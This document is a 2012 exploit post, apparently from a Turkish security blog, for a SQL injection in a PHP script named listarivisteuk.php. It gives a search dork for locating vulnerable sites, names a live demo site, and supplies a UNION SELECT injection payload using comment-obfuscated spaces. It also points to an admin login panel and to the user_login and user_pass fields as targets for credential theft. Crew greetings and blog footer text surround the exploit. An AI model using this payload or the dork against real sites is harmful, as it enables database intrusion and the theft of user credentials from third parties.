########################################################
~ Exploit Title: * Listarivisteuk SQL Injection *~
~ Author: Th4 MasK
~ Contact to ; th4_mask@windowslive.com ~
~ Date : 27.01.2012 ~
~ Platform : Php ~
########################################################
~ Dork: listarivisteuk.php?Id?=
########################################################
~ Demo Site :
~ http://www.fgda.org/listarivisteuk.php?Id=1
Exploit :
http://localhost/listarivisteuk.php?Id?=(id)/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/@@version,/**/2--
Poc//
Panel :HTTP://localhost/login.php
User :User_login
Password :User_pass
########################################################
~* Bilinmezlik Diyari
########################################################
~* Olmassa Olmazimdir. Bazi seyler.
########################################################
~* Email:th4_mask@windowslive.com~
~ Greetz: http://th4mask.blogspot.com ~ TurkWebSecurity.Net
########################################################
TWS Family
~ Evillord,Mugair,Nikolay,Darkness Devil
~ TurkWebSecurity.Net ~ http://th4mask.blogspot.com/
########################################################
Special Thanx : HancHer
27 Ocak 2012 Cuma
Studio Manolibera Listarivisteuk SQL Injection ~ Th4 MasK [ Bug Res.]
Kaydol:
Kayıt Yorumları (Atom)
Hiç yorum yok:
Yorum Gönder